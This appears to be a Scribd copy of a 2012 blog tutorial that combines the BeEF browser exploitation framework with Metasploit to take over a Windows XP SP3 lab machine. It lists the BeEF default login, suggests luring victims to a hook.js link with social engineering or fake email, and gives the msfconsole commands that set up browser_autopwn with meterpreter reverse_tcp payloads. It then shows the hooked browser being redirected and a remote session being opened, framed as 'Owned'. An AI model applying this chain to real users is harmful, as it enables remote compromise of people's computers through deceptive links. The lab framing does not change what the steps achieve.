Scribd
Upload
67 views6 pages

Exploit Combo Beef It

Beef, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my xp SP3 machine.

Uploaded by

5forA
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
67 views6 pages

Exploit Combo Beef It

Beef, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my xp SP3 machine.

Uploaded by

5forA
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 6

Exploit Combo ~ BeeF & Metasploit

Exploitation is so much fun and exciting for me.. :D

In this post I'll try to combine BeeF and Metasploit to create an Attack. BeeF, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my XP SP3 Machine. Lets get started.. >:) - First, start your BeeF-ng services..

Open its control panel http://localhost:3000/ui/panel

on

our

backtrack.

The

address

is

- Authenticate ourself, default user:beef and password:beef - Logged in.

- Ok, next is send a link contain the hook.js file to the victim. Lets say, using social engineering or the other technique like fake email or spoofing, I was able to make my victim visit the malicious link. I will just use the demo site provided by BeeF.

- After the victim visit the link, it will appear on the "hooked browsers" section on the BeeF control panel.

- Ok, good. Now start up metasploit console. # msfconsole

- We will use the auxiliary/server/browser_autopwn to attack our victim. Setup the msfconsole as follows. msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST 192.168.56.1 msf auxiliary(browser_autopwn) > set PAYLOAD_WIN32 windows/meterpreter/reverse_tcp PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp

msf auxiliary(browser_autopwn) > set java/meterpreter/reverse_tcp PAYLOAD_JAVA => java/meterpreter/reverse_tcp

PAYLOAD_JAVA

- Type 'exploit' to start the browser_autopwn server. Wait until it finished loading all exploit.

- Notice the Url.

- We must redirect the browsers victim to our address where the metasploit browser_autopwn is waiting. In my case will be 192.168.56.1:8080/JuwbJrk - Back to the BeeF control panel, go to commands>browser>site redirect

- Point to our address.

- Execute..

- And wait what will happen at the metasploit console

- A meterpreter sessions is oppened.. :D - To see the list of opened sessions type "sessions -l"

- To connect/interact with that sessions type "sessions -i 1"

- Owned.. >:D Combo exploitation successfull.. Still have to train my attack vector though, this is not enough.. :) "the quieter you become, the more you are able to hear.." Read more: http://scx010c075.blogspot.com/2012/02/exploit-combo-beefmetasploit.html#ixzz1uGXSzCsp

You might also like